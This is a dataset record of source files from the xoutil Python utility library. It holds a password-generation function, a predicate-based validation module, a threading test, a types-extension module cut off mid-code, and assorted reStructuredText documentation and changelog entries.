`PASS_PHRASE_LEVEL_BASIC`:data:\n\n Generate the same pass-phrase, just removing invalid characters and\n converting the result to lower-case.\n\n `PASS_PHRASE_LEVEL_MAPPED`:data:\n\n Replace some characters with new values: ``'e'->'3'``, ``'i'->'1'``,\n ``'o'->'0'``, ``'s'->'5'``.\n\n `PASS_PHRASE_LEVEL_MAPPED_MIXED`:data:\n\n Consonants characters before 'M' (included) are converted to\n upper-case, all other are kept lower-case.\n\n `PASS_PHRASE_LEVEL_MAPPED_DATED`:data:\n\n Adds a suffix with the year of current date (\"<YYYY>\").\n\n `PASS_PHRASE_LEVEL_STRICT`:data:\n\n Randomly scramble previous result until unbreakable strong password is\n obtained.\n\n If `pass_phrase` is ``None`` or an empty string, generate a \"secure salt\"\n (a password not based in a source pass-phrase). A \"secure salt\" is\n generated by scrambling the concatenation of a random phrases from the\n alphanumeric vocabulary.\n\n Returned password size is ``4*level`` except when a `pass-phrase` is given\n for `level` <= 4 where depend on the count of valid characters of\n `pass-phrase` argument, although minimum required is warranted. When\n `pass-phrase` is ``None`` for `level` zero or negative, size ``4`` is\n assumed. First four levels are considered weak.\n\n Maximum size is defined in the :data:`MAX_PASSWORD_SIZE` constant.\n\n Default level is :data:`PASS_PHRASE_LEVEL_MAPPED_DATED` when using a\n pass-phrase.\n\n \"\"\"\n from random import sample, randint\n from xotl.tools.string import slugify\n\n level = _normalize_level(level)\n size = MAX_PASSWORD_SIZE + 1 # means, return all calculated\n required = min(max(level, 1) * BASIC_PASSWORD_SIZE, MAX_PASSWORD_SIZE)\n if pass_phrase:\n # PASS_PHRASE_LEVEL_BASIC\n res = slugify(pass_phrase, \"\", invalid_chars=\"_\")\n if level >= PASS_PHRASE_LEVEL_MAPPED:\n for (old, new) in (\"e3\", \"i1\", \"o0\", \"s5\"):\n res = res.replace(old, new)\n if level >= PASS_PHRASE_LEVEL_MAPPED_MIXED:\n for new in \"BCDFGHJKLM\":\n old = new.lower()\n res = res.replace(old, new)\n if level >= PASS_PHRASE_LEVEL_MAPPED_DATED:\n from datetime import datetime\n\n today = datetime.today()\n res += today.strftime(\"%Y\")\n if level >= PASS_PHRASE_LEVEL_STRICT:\n size = required\n else:\n size = required\n count = randint(BASIC_PASSWORD_SIZE, 2 * BASIC_PASSWORD_SIZE)\n res = \"\".join(sample(SAMPLE, count))\n if size <= MAX_PASSWORD_SIZE:\n if len(res) < size:\n needed = (size - len(res)) // BASIC_PASSWORD_SIZE + 1\n res += generate_password(None, needed)\n res = \"\".join(sample(res, size))\n return res[:size]\n" }, { "alpha_fraction": 0.7203682661056519, "alphanum_fraction": 0.7376294732093811, "avg_line_length": 36.78260803222656, "blob_id": "4204179c229fc7343a2dd5cd82287986c024a4f5", "content_id": "ff768c482ecaf6eec423c0e85f2374c3a59862a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 869, "license_type": "no_license", "max_line_length": 95, "num_lines": 23, "path": "/README.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xoutil` is a collection of disparate utilities that does not conform a\nframework for anything. `xoutil` is essentially -but not exclusively- an\nextension to the Python's standard library.\n\nIn `xoutil` you will probably find:\n\n- Tools that must be implemented in the Python Standard Library, but there are\n things that escape from the Guido's scope. ;)\n\n- Components that belong naturally to the \"Common Systems Layer\" \\\n [#continuum]_.\n\n- Compatibility solvers for major versions issues\\ [#another-six]_. See\n `xoutil.eight`.\n\n .. note:: Starting with xoutil 2.0, support for Python 2 is no longer\n supported. Use a version of xoutil 1.9.x to have the latest developments\n with Python 2 support.\n\n\n.. [#another-six] Yes!, yet another solution for this. ;)\n\n.. [#continuum] http://pubs.opengroup.org/architecture/togaf9-doc/arch/chap39.html#tag_39_04_01\n" }, { "alpha_fraction": 0.5144417881965637, "alphanum_fraction": 0.516542375087738, "avg_line_length": 28.295385360717773, "blob_id": "7eee13c45ca02f8cc25276b508230e878c30c78d", "content_id": "d6926e5756a5ba2c4d397b260878f10bba9ffdff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9526, "license_type": "no_license", "max_line_length": 78, "num_lines": 325, "path": "/xotl/tools/fp/prove/semantic.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Prove validity of values - Base predicate classes.\n\nA `predicate`:class: could combine two concepts (*validation* and\n*conversion*) in a single callable object.\n\n\"\"\"\n\n\nclass predicate:\n \"\"\"Base class for value proves using logic predicates.\n\n A predicate could combine two operations on values: *validation*, and\n *conversion*.\n\n To signal that value as invalid, a predicate must return the special value\n `_wrong`. Types work as in `isinstance`:func: standard function; callable\n functions mould a parameter value into a definitive form.\n\n To use normal functions as a callable predicate, use `SafeCheck`:class: or\n `LogicalCheck`:class` to wrap them.\n\n When using a list to combine explicitly the two concepts, result of the\n check part is considered Boolean (True or False), and the second part\n alwasy return a moulded value.\n\n When use a predicate, several definitions will be tried until one succeed.\n\n \"\"\"\n\n __slots__ = (\"inner\",)\n\n def __new__(cls, *args):\n if cls is predicate: # Parse the right sub-type\n count = len(args)\n if count == 0:\n msg = \"{}() takes at least 1 argument (0 given)\"\n raise TypeError(msg.format(cls.__name__))\n elif count == 1:\n arg = args[0]\n if isinstance(arg, cls):\n return arg\n elif isinstance(arg, (tuple, type)):\n return TypeCheck(arg)\n elif isinstance(arg, list):\n return CheckAndCast(*arg)\n elif callable(arg):\n return LogicalCheck(arg)\n else:\n msg = \"{}() can't parse a definition of type: {}\"\n aname = type(arg).__name__\n raise TypeError(msg.format(cls.__name__, aname))\n else:\n return MultiCheck(*args)\n else:\n return super().__new__(cls)\n\n def __init__(self, *args):\n pass\n\n def __repr__(self):\n return str(self)\n\n\nclass TypeCheck(predicate):\n \"\"\"Check if value is instance of given types.\"\"\"\n\n __slots__ = ()\n\n def __new__(cls, *args):\n from xotl.tools.params import check_count\n\n check_count(len(args) + 1, 2, caller=cls.__name__)\n if len(args) == 1 and isinstance(args[0], tuple):\n args = args[0]\n if all(isinstance(arg, type) for arg in args):\n self = super().__new__(cls)\n self.inner = args\n return self\n else:\n wrong = (arg for arg in args if not isinstance(arg, type))\n wnames = \", or \".join(type(w).__name__ for w in wrong)\n msg = \"`TypeCheck` allows only valid types, not: ({})\"\n raise TypeError(msg.format(wnames))\n\n def __call__(self, value):\n from xotl.tools.fp.option import Just, Wrong\n\n ok = isinstance(value, self.inner)\n return (value if value else Just(value)) if ok else Wrong(value)\n\n def __str__(self):\n return self._str()\n\n def __crop__(self, max_width=None, canonical=False):\n \"\"\"Calculate both string versions (small and normal).\"\"\"\n from xotl.tools.symbols import Undefined\n from xotl.tools.clipping import ELLIPSIS, DEFAULT_MAX_WIDTH\n\n if max_width is None:\n max_width = DEFAULT_MAX_WIDTH # a big number for this\n start, end = \"{}(\".format(type(self).__name__), \")\"\n borders_len = len(start) + len(end)\n sep = \", \"\n res = \"\"\n items = iter(self.inner)\n ok = True\n while ok:\n item = next(items, Undefined)\n if item is not Undefined:\n if res:\n res += sep\n aux = item.__name__\n if len(res) + len(aux) + borders_len <= max_width:\n res += aux\n else:\n res += ELLIPSIS\n ok = False\n else:\n ok = False\n return \"{}{}{}\".format(start, res, end)\n\n\nclass NoneOrTypeCheck(TypeCheck):\n \"\"\"Check if value is None or instance of given types.\"\"\"\n\n __slots__ = ()\n\n def __call__(self, value):\n from xotl.tools.fp.option import Wrong\n\n if value is None:\n _types = self.inner\n i, res = 0, None\n while res is None and i < len(_types):\n try:\n res = _types[i]()\n except Exception:\n pass\n i += 1\n return res if res is not None else Wrong(None)\n else:\n return super().__call__(value)\n\n def __str__(self):\n aux = super().__str__()\n return \"none-or-{}\".format(aux)\n\n\nclass TypeCast(TypeCheck):\n \"\"\"Cast a value to a correct type.\"\"\"\n\n __slots__ = ()\n\n def __call__(self, value):\n from xotl.tools.fp.option import Just\n\n res = super().__call__(value)\n if not res:\n _types = self.inner\n i = 0\n while not res and i < len(_types):\n try:\n res = _types[i](value)\n if not res:\n res = Just(res)\n except Exception:\n pass\n i += 1\n return res\n\n def __str__(self):\n # FIX: change this\n aux = super(NoneOrTypeCheck, self).__str__()\n return \"none-or-{}\".format(aux)\n\n\nclass CheckAndCast(predicate):\n \"\"\"Check if value, if valid cast it.\n\n Result value must be valid also.\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, check, cast):\n check = predicate(check)\n if callable(cast):\n self = super().__new__(cls)\n self.inner = (check, SafeCheck(cast))\n return self\n else:\n msg = '{}() expects a callable for cast, \"{}\" given'\n sname = type(self).__name__\n raise TypeError(msg.format(sname, type(cast).__name__))\n\n def __call__(self, value):\n from xotl.tools.fp.option import Wrong\n\n check, cast = self.inner\n aux = check(value)\n if aux:\n res = cast(value)\n if check(res):\n return res\n else:\n res = aux\n if isinstance(res, Wrong):\n return res\n else:\n return Wrong(value)\n\n def __str__(self):\n from xotl.tools.clipping import crop\n\n check, cast = self.inner\n fmt = \"({}(…) if {}(…) else _wrong)\"\n return fmt.format(crop(cast), check)\n\n\nclass FunctionalCheck(predicate):\n \"\"\"Check if value is valid with a callable function.\"\"\"\n\n __slots__ = ()\n\n def __new__(cls, check):\n # TODO: Change next, don't use isinstance\n if isinstance(check, predicate):\n return check\n elif callable(check):\n self = super().__new__(cls)\n self.inner = check\n return self\n else:\n msg = 'a functional check expects a callable but \"{}\" is given'\n raise TypeError(msg.format(type(check).__name__))\n\n def __str__(self):\n from xotl.tools.clipping import crop\n\n suffix = \"check\"\n kind = type(self).__name__.lower()\n if kind.endswith(suffix):\n kind = kind[: -len(suffix)]\n inner = crop(self.inner)\n return \"{}({})()\".format(kind, inner)\n\n\nclass LogicalCheck(FunctionalCheck):\n \"\"\"Check if value is valid with a callable function.\"\"\"\n\n __slots__ = ()\n\n def __call__(self, value):\n from xotl.tools.fp.option import Just, Wrong\n\n try:\n res = self.inner(value)\n if res:\n if isinstance(res, Just):\n return res\n elif res is True:\n return Just(value)\n else:\n return res\n elif isinstance(res, Wrong):\n return res\n elif res is False or res is None: # XXX: None?\n return Wrong(value)\n else:\n return Wrong(res)\n except Exception as error:\n return Wrong(error)\n\n\nclass SafeCheck(FunctionalCheck):\n \"\"\"Return a wrong value only if function produce an exception.\"\"\"\n\n __slots__ = ()\n\n def __call__(self, value):\n from xotl.tools.fp.option import Wrong\n\n try:\n return self.inner(value)\n except Exception as error:\n return Wrong(error)\n\n\nclass MultiCheck(predicate):\n \"\"\"Return a wrong value only when all inner predicates fails.\n\n Haskell: guards (pp. 132)\n\n \"\"\"\n\n __slots__ = ()\n\n def __new__(cls, *args):\n inner = tuple(predicate(arg) for arg in args)\n self = super().__new__(cls)\n self.inner = inner\n return self\n\n def __call__(self, value):\n from xotl.tools.fp.option import Just, Wrong, none\n\n predicates = self.inner\n i, res = 0, none\n while isinstance(res, Wrong) and i < len(predicates):\n res = predicates[i](value)\n i += 1\n return res.inner if isinstance(res, Just) and res.inner else res\n\n def __str__(self):\n aux = \" OR \".join(str(c) for c in self.inner)\n return \"combo({})\".format(aux)\n" }, { "alpha_fraction": 0.7492354512214661, "alphanum_fraction": 0.7584097981452942, "avg_line_length": 53.5, "blob_id": "0738cf7d73552766a84f41f14829b6cc7159fd43", "content_id": "71e770d2c094be8526577268f5b784a54d7aeaf2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 327, "license_type": "permissive", "max_line_length": 77, "num_lines": 6, "path": "/docs/source/history/_changes-1.6.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Changes the signature of `xoutil.names.nameof`:func:, also the semantics of\n the `full` parameter is improved.\n\n This is the major change in this release. Actually, this release has being\n prepared in sync with the release 1.5.6 (just a few days ago) to have this\n change passed while still keeping our versions scheme.\n" }, { "alpha_fraction": 0.47390222549438477, "alphanum_fraction": 0.4962717592716217, "avg_line_length": 26.43181800842285, "blob_id": "2379c4dac34404ea452f7610bac5d07983c5a64f", "content_id": "d91395def2ca49deb818e2e9be5e800b7ae6ed3f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1208, "license_type": "no_license", "max_line_length": 72, "num_lines": 44, "path": "/tests/test_safe.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\nfrom xoutil.tasking.safe import SafeData\n\n\ndef test_safe():\n from xoutil.future.threading import async_call\n from time import sleep\n\n data = {}\n qd = SafeData(data, timeout=5.0)\n\n def inner(name, start, end):\n step = 1 if start < end else -1\n for i in range(start, end, step):\n with qd as d:\n d[i] = d.get(i, 0) + 1\n sleep(0.001 * i)\n with qd as d:\n d[name] = True\n\n one, two = \"one\", \"two\"\n async_call(inner, args=[one, 1, 6])\n async_call(inner, args=[two, 8, 3])\n finish = {one: False, two: False}\n while not (finish[one] and finish[two]):\n with qd as d:\n for k in (one, two):\n if d.get(k):\n finish[k] = True\n sleep(0.001)\n aux = {i: 1 for i in range(1, 6)}\n for i in range(8, 3, -1):\n aux[i] = aux.get(i, 0) + 1\n aux[one] = aux[two] = True\n assert data == aux\n" }, { "alpha_fraction": 0.6282973885536194, "alphanum_fraction": 0.6354916095733643, "avg_line_length": 33.75, "blob_id": "3634497f059923e24687c6f0d21c06ac81648f18", "content_id": "d8af61b4d9af18e3d6157ca0eec7a260e8794e19", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 417, "license_type": "permissive", "max_line_length": 74, "num_lines": 12, "path": "/docs/source/xotl.tools/future/pprint.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "``xotl.tools.future.pprint`` - Extension to the data pretty printer\n===================================================================\n\n.. module:: xotl.tools.future.pprint\n\nThis modules includes all the Python's standard library features in module\n`pprint`:mod: and adds the function `ppformat`:func:, which just returns a\nstring of the pretty-formatted object.\n\n.. versionadded:: 1.4.1\n\n.. autofunction:: ppformat\n" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.7407407164573669, "avg_line_length": 31.399999618530273, "blob_id": "2b79751b59b9e3caa6e6c5862cc475d5335c2ad8", "content_id": "4e47f02a315ae8a2861eb69e1a7a814a534032c6", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 162, "license_type": "permissive", "max_line_length": 66, "num_lines": 5, "path": "/docs/source/history/_changes-2.1.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Fix packaging issue with the namespace 'xotl'.\n\n- Add `xotl.tools.future.itertools.iter_without_duplicates`:func:.\n\n- Add `xotl.tools.fp.tools.constant`:func:.\n" }, { "alpha_fraction": 0.7107208967208862, "alphanum_fraction": 0.7181146144866943, "avg_line_length": 27.473684310913086, "blob_id": "33739ebb0912bb7c562e735e1947cde0f1de4242", "content_id": "585cb0b5a9258af1410bb3b7c256001621f349e2", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 1082, "license_type": "permissive", "max_line_length": 78, "num_lines": 38, "path": "/docs/source/history/_changes-1.7.1.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Add `xoutil.collections.PascalSet`:class: and\n `xoutil.collections.BitPascalSet`:class:.\n\n- Add `xoutil.functools.lwraps`:func:.\n\n- Add `xoutil.objects.multi_getter`:func:,\n `xoutil.objects.get_branch_subclasses`:func:,\n `xoutil.objects.fix_method_documentation`:func:.\n\n- Add `xoutil.string.safe_str`:func:\n\n- Remove long deprecated modules: `!xoutil.aop`:mod: and `!xoutil.proxy`:mod:.\n\n- Deprecate ``xoutil.html`` entirely.\n\n- The following modules are included on a *provisional basis*. Backwards\n incompatible changes (up to and including removal of the module) may occur\n if deemed necessary by the core developers:\n\n - `xoutil.connote`:mod:.\n\n - `xoutil.params`:mod:.\n\nFixes in 1.7.1.post1:\n\n- Fix issue with both `xoutil.string.safe_decode`:func: and\n `xoutil.string.safe_encode`:func:.\n\n Previously, the parameter encoding could contain an invalid encoding name\n and the function could fail.\n\n\nFixes in 1.7.1.post2:\n\n- Fix `xoutil.string.cut_suffix`:func:. The following invariant was being\n violated::\n\n >>> cut_suffix(v, '') == v # for any value of 'v'\n" }, { "alpha_fraction": 0.47445255517959595, "alphanum_fraction": 0.47445255517959595, "avg_line_length": 26.399999618530273, "blob_id": "9512bf93e2511c5e134166637e683c71d511b59a", "content_id": "e1895c4f74d31a6dd7dc878011a7d456ca8da2bc", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 137, "license_type": "permissive", "max_line_length": 43, "num_lines": 5, "path": "/docs/source/xotl.tools/symbols.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.symbols`:mod: -- Logical values\n===========================================\n\n.. automodule:: xotl.tools.symbols\n :members:\n" }, { "alpha_fraction": 0.6875, "alphanum_fraction": 0.75, "avg_line_length": 63, "blob_id": "63deb675913c452972760a7053d73e9231d6b2f9", "content_id": "619a4959e6e8fd1018279ee6a293a6262bdf5f76", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 64, "license_type": "permissive", "max_line_length": 63, "num_lines": 1, "path": "/docs/source/history/_changes-2.2.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Drop support for Python 3.5 and commit to support Python 3.8.\n" }, { "alpha_fraction": 0.6174757480621338, "alphanum_fraction": 0.6233009696006775, "avg_line_length": 38.61538314819336, "blob_id": "d058a92e3baf0967ab5e1066bc9d687a6ee1dd9d", "content_id": "b9b1c8a221cbe6c18e20a01a2eaf45219f7d24a0", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 515, "license_type": "permissive", "max_line_length": 101, "num_lines": 13, "path": "/docs/source/xotl.tools/string.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.string`:mod: - Common string operations\n===================================================\n\n.. automodule:: xotl.tools.string\n :members: cut_prefix, cut_any_prefix, cut_prefixes, cut_suffix,\n cut_any_suffix, cut_suffixes, error2str, make_a10z\n\n\n.. autofunction:: slugify(value, replacement='-', invalid_chars='', valid_chars='', encoding=None)\n\n.. function:: normalize_slug(value, replacement='-', invalid_chars='', valid_chars='', encoding=None)\n\n Deprecated alias of `slugify`:func:.\n" }, { "alpha_fraction": 0.6902173757553101, "alphanum_fraction": 0.7228260636329651, "avg_line_length": 45, "blob_id": "73f945f7f98e6a17e24d3f13117a060991683c13", "content_id": "1e625ca495f8543ff6ef0dbec6c3337dea7b0614", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 184, "license_type": "permissive", "max_line_length": 78, "num_lines": 4, "path": "/docs/source/history/_changes-2.0.4.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Incorporates all (applicable) changes from `release 1.9.4 <rel-1.9.4>`:ref:\\ :\n\n- All changes in `xoutil.validators.identifiers`:mod: are now update to use\n `str.isidentifier`:meth:.\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "0c0b9caac182d7b5589c9959f79025b99cd6e623", "content_id": "698b5e322b9d1b9007bbb3f25ea0454fa1b60a83", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.6.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "Incorporates all (applicable) changes from `release 1.9.6 <rel-1.9.6>`:ref:\\ :\n" }, { "alpha_fraction": 0.7630922794342041, "alphanum_fraction": 0.7680798172950745, "avg_line_length": 41.21052551269531, "blob_id": "1f6165774782f9326e07ddd7bd037dccf13fb732", "content_id": "de25db25e386ce1be3255e00b45f79f115a753ce", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 802, "license_type": "permissive", "max_line_length": 77, "num_lines": 19, "path": "/docs/source/history/_changes-1.7.0.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "This release was mainly focused in providing a new starting point for several\nother changes. This release is being synchronized with the last release of\nthe 1.6.11 to allow deprecation messages to be included properly.\n\nThe following is the list of changes:\n\n- The `defaults` `xoutil.objects.smart_copy`:func: has being made keyword\n only.\n\n- Deprecates the `~xoutil.collections.StackedDict.pop`:meth: semantics, they\n shadow the `dict.pop`:func:. A new\n `~xoutil.collections.StackedDict.pop_level`:meth: is provided to explicitly\n pop a stack level. The same is done for the\n `~xoutil.collections.StackedDict.pop`:meth: method.\n\n- Deprecates function ``xoutil.iterators.fake_dict_iteritems``.\n\n- Deprecates `xoutil.objects.metaclass`:class: in favor for\n `xoutil.eight.meta.metaclass`:func:.\n" }, { "alpha_fraction": 0.6202531456947327, "alphanum_fraction": 0.6962025165557861, "avg_line_length": 78, "blob_id": "7ec20e3d118179ac82b72b8c315356f4802d1f2b", "content_id": "fabbb0e99638f86ff3bcdd4190c8a760f9dbf53f", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 79, "license_type": "permissive", "max_line_length": 78, "num_lines": 1, "path": "/docs/source/history/_changes-2.0.3.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "- Incorporates all (applicable) changes from `release 1.9.3 <rel-1.9.3>`:ref:.\n" }, { "alpha_fraction": 0.6365503072738647, "alphanum_fraction": 0.6447638869285583, "avg_line_length": 29.4375, "blob_id": "9dcb8b132ca027b1d23cabb364ab68ef09a9dc65", "content_id": "7215b1a46f55b6a757529f98c977b02c42c82aeb", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 487, "license_type": "permissive", "max_line_length": 77, "num_lines": 16, "path": "/docs/source/xotl.tools/future/threading.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.threading`:mod: - Higher-level threading interface\n=====================================================================\n\n.. module:: xotl.tools.future.threading\n\nThis module extends the standard library's `threading`:mod:. You may use it\nas a drop-in replacement in many cases.\n\nAvoid importing ``*`` from this module since could be different in Python 2.7\nand Python 3.3.\n\nWe added the following features.\n\n.. autofunction:: async_call\n\n.. autofunction:: sync_call\n" }, { "alpha_fraction": 0.629382312297821, "alphanum_fraction": 0.634390652179718, "avg_line_length": 36.4375, "blob_id": "fbfb7e904421477d0f5069bb52ad458327fc86c5", "content_id": "30fb5769c3842aae52920fdfdc078908717a8e52", "detected_licenses": [ "Python-2.0", "LicenseRef-scancode-unknown-license-reference" ], "is_generated": false, "is_vendor": false, "language": "reStructuredText", "length_bytes": 599, "license_type": "permissive", "max_line_length": 80, "num_lines": 16, "path": "/docs/source/xotl.tools/future/subprocess.rst", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "`xotl.tools.future.subprocess`:mod: - Extensions to `subprocess` stardard module\n================================================================================\n\n.. module:: xotl.tools.future.subprocess\n\n.. versionadded:: 1.2.1\n\nThis module contains extensions to the `subprocess`:mod: standard library\nmodule. It may be used as a replacement of the standard.\n\n.. function:: call_and_check_output(args, *, stdin=None, shell=False)\n\n This function combines the result of both `call` and `check_output` (from\n the standard library module).\n\n Returns a tuple ``(retcode, output, err_output)``.\n" }, { "alpha_fraction": 0.59329754114151, "alphanum_fraction": 0.5994794368743896, "avg_line_length": 23.200786590576172, "blob_id": "82a2d634adb93575039d564c23ee05080096519a", "content_id": "6f343fdeab0928ab5afed9f58621456b9215cf95", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12295, "license_type": "no_license", "max_line_length": 78, "num_lines": 508, "path": "/xotl/tools/future/types.py", "repo_name": "merchise-autrement/xoutil", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# ---------------------------------------------------------------------\n# Copyright (c) Merchise Autrement [~º/~] and Contributors\n# All rights reserved.\n#\n# This is free software; you can do what the LICENCE file allows you to.\n#\n\n\"\"\"Extends the standard `types` module.\n\nStandard module defines names for all type symbols known in the standard\ninterpreter.\n\nThis modules mirrors all the functions (and, in general, objects) from the\nstandard library module `types`:mod:; but it also includes several new types\nand type-related functions.\n\nIn Jython and PyPy, `MemberDescriptorType` is identical to\n`GetSetDescriptorType`; to mantain compatibility in some `xotl.tools` code,\nthey are differentiated in this module.\n\n\"\"\"\n\nfrom types import * # noqa\nimport types as _stdlib # noqa\n\nfrom xotl.tools.deprecation import deprecated\n\nfrom xotl.tools.symbols import Unset as _unset\nfrom collections import Mapping\n\n\ntry:\n from types import __all__ # noqa\n\n __all__ = list(__all__)\nexcept ImportError:\n # Python 3.3 don't implement '__all__' for 'string' module.\n __all__ = [name for name in dir(_stdlib) if not name.startswith(\"_\")]\n\ntry:\n NoneType = _stdlib.NoneType # noqa\nexcept AttributeError:\n try:\n # In PyPy3 'NoneType' is a built-in\n from builtins import NoneType # noqa\n except ImportError:\n NoneType = type(None)\n __all__.append(\"NoneType\")\n\ntry:\n # It is maintained in this module for perhaps using it in `mypy`.\n EllipsisType # noqa\nexcept NameError:\n EllipsisType = type(Ellipsis)\n __all__.append(\"EllipsisType\")\n\n# Check Jython and PyPy peculiarity\nif MemberDescriptorType is GetSetDescriptorType: # noqa\n\n class _foo:\n __slots__ = \"bar\"\n\n MemberDescriptorType = type(_foo.bar)\n del _foo\n\nFuncTypes = tuple(\n {\n FunctionType,\n MethodType,\n LambdaType, # noqa\n BuiltinFunctionType,\n BuiltinMethodType,\n }\n) # noqa\n\nfunc_types = FuncTypes # Just an alias\n\nfrom types import _calculate_meta # noqa\n\n\nimport re\n\nRegexPattern = type(re.compile(\"\"))\ndel re\n\n\ndef _get_mro_attr(target, name, *default):\n \"\"\"Get a named attribute from a type.\n\n Similar to `getattr` but looking in the MRO dictionaries for the type.\n Used internally in this module.\n\n For example::\n\n >>> class A(SimpleNamespace):\n ... x = 12\n ... y = 34\n\n >>> class B(A):\n ... y = 56\n\n >>> b = B(x=1, y=2)\n\n >>> _get_mro_attr(b, 'x')\n 12\n\n >>> _get_mro_attr(b, 'y')\n 56\n\n \"\"\"\n from xotl.tools.future.inspect import _static_getmro\n from xotl.tools.params import check_default, Undefined\n\n # force type\n target = target if isinstance(target, type) else type(target)\n target_mro = _static_getmro(target)\n cls = next((c for c in target_mro if name in c.__dict__), _unset)\n if cls is not _unset:\n return cls.__dict__[name]\n elif check_default()(*default) is not Undefined:\n return default[0]\n else:\n msg = \"'{}' type has no attribute '{}'\"\n raise AttributeError(msg.format(target, name))\n\n\n@deprecated(_get_mro_attr)\nclass mro_dict(Mapping):\n \"\"\"Utility behaving like a read-only dict of `target` MRO attributes.\n\n Used internally in this module.\n\n For example::\n\n >>> class A:\n ... x = 12\n ... y = 34\n\n >>> class B(A):\n ... y = 56\n ... z = 78\n\n >>> d = mro_dict(B)\n\n >>> d['x']\n 12\n\n >>> d['y']\n 56\n\n >>> d['z']\n 78\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n\n __slots__ = (\"_probes\", \"_keys\")\n\n def __init__(self, target):\n from xotl.tools.future.inspect import _static_getmro\n\n type_ = target if isinstance(target, type) else type(target)\n target_mro = _static_getmro(type_)\n self._probes = tuple(c.__dict__ for c in target_mro)\n self._keys = set()\n\n def __getitem__(self, name):\n from xotl.tools.objects import get_first_of\n\n result = get_first_of(self._probes, name, default=_unset)\n if result is not _unset:\n return result\n else:\n raise KeyError(name)\n\n def __iter__(self):\n if not self._keys:\n self._settle_keys()\n return iter(self._keys)\n\n def __len__(self):\n if not self._keys:\n self._settle_keys()\n return len(self._keys)\n\n def _settle_keys(self):\n for probe in self._probes:\n for key in probe:\n if key not in self._keys:\n self._keys.add(key)\n\n\n@deprecated(\"None\", '\"mro_get_value_list\" will be removed.')\ndef mro_get_value_list(cls, name):\n \"\"\"Return a list with all `cls` class attributes in MRO.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n return list(mro_get_full_mapping(cls, name).values())\n\n\n@deprecated(\"None\", '\"mro_get_full_mapping\" will be removed.')\ndef mro_get_full_mapping(cls, name):\n \"\"\"Return a dictionary with all items from `cls` in MRO.\n\n All values corresponding to `name` must be valid mappings.\n\n .. deprecated:: 1.8.4\n\n \"\"\"\n from xotl.tools.future.inspect import _static_getmro\n\n cls = cls if isinstance(cls, type) else type(cls) # force type\n mro = 